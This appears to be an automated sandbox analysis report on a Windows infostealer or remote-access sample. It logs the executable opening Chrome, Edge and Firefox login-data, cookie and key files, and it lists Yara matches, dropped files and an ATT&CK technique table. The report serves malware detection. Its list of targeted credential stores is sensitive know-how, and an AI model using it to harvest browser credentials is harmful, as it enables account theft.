                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State

                          Remote Access Functionality

                          Source: Yara match, File source: updIMdPUj8.exe, type: SAMPLE
                          Source: Yara match, File source: 5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match, File source: 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: updIMdPUj8.exe PID: 7324, type: MEMORYSTR
                          Source: Yara match, File source: Process Memory Space: hypersurrogateComponentdhcp.exe PID: 7600, type: MEMORYSTR
                          Source: Yara match, File source: Process Memory Space: ZWgKQlTqcrSB.exe PID: 3300, type: MEMORYSTR
                          Source: Yara match, File source: C:\Recovery\csrss.exe, type: DROPPED
                          Source: Yara match, File source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, type: DROPPED
                          Source: Yara match, File source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, type: DROPPED
                          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                          | Gather Victim Identity Information | 11 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                          | Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
                          | Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 167 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
